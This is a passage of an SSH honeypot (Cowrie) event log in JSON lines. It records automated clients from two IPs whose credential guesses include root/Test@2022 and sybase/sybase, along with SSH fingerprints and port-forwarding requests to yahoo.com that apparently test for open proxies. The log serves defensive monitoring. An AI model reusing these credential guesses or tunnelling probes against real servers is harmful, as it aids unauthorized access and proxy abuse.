0-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.533903Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.815639Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":7608,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:7608","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.873298Z","session":"35ec250c4ebb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:15.930266Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14410,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14410","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.087100Z","session":"35ec250c4ebb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.143796Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.201614Z","src_ip":"213.209.150.239","session":"35ec250c4ebb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55358,"dst_ip":"1.2.3.4","dst_port":22,"session":"2066d880394a","protocol":"ssh","message":"New connection: 213.209.150.239:55358 (1.2.3.4:22) [session: 2066d880394a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.247789Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.248708Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.296192Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.531159Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8189,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8189","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.579314Z","session":"2066d880394a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.626446Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":24264,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24264","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.761405Z","session":"2066d880394a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.808584Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.856258Z","src_ip":"213.209.150.239","session":"2066d880394a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55398,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e6894615ed","protocol":"ssh","message":"New connection: 213.209.150.239:55398 (1.2.3.4:22) [session: d3e6894615ed]","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.912215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.913388Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:16.970078Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.253180Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14790,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14790","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.311173Z","session":"d3e6894615ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.368068Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":1550,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:1550","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.523099Z","session":"d3e6894615ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.580868Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.638894Z","src_ip":"213.209.150.239","session":"d3e6894615ed"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55461,"dst_ip":"1.2.3.4","dst_port":22,"session":"da086d0f6cbc","protocol":"ssh","message":"New connection: 213.209.150.239:55461 (1.2.3.4:22) [session: da086d0f6cbc]","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.684960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.686157Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.733612Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:17.968781Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":270,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:270","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.016784Z","session":"da086d0f6cbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.064786Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":12560,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:12560","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.201721Z","session":"da086d0f6cbc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.249246Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.297668Z","src_ip":"213.209.150.239","session":"da086d0f6cbc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55509,"dst_ip":"1.2.3.4","dst_port":22,"session":"9357119f6fc9","protocol":"ssh","message":"New connection: 213.209.150.239:55509 (1.2.3.4:22) [session: 9357119f6fc9]","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.353153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.353951Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34532,"dst_ip":"1.2.3.4","dst_port":22,"session":"303af360e88f","protocol":"ssh","message":"New connection: 212.227.125.160:34532 (1.2.3.4:22) [session: 303af360e88f]","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.410049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.411493Z","src_ip":"212.227.125.160","session":"303af360e88f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.412276Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.461559Z","src_ip":"212.227.125.160","session":"303af360e88f"}
{"eventid":"cowrie.login.failed","username":"sybase","password":"sybase","message":"login attempt [sybase/sybase] failed","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.613341Z","src_ip":"212.227.125.160","session":"303af360e88f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.693256Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":13967,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:13967","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.750774Z","session":"9357119f6fc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.807471Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":32133,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:32133","sensor":"my-vps","timestamp":"2025-08-26T00:56:18.963024Z","session":"9357119f6fc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.019558Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.077157Z","src_ip":"213.209.150.239","session":"9357119f6fc9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":55564,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e1df4d32223","protocol":"ssh","message":"New connection: 213.209.150.239:55564 (1.2.3.4:22) [session: 7e1df4d32223]","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.123690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:19.124362Z","src_ip":"213.209.150.239","session":"7e1df4d32223"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com"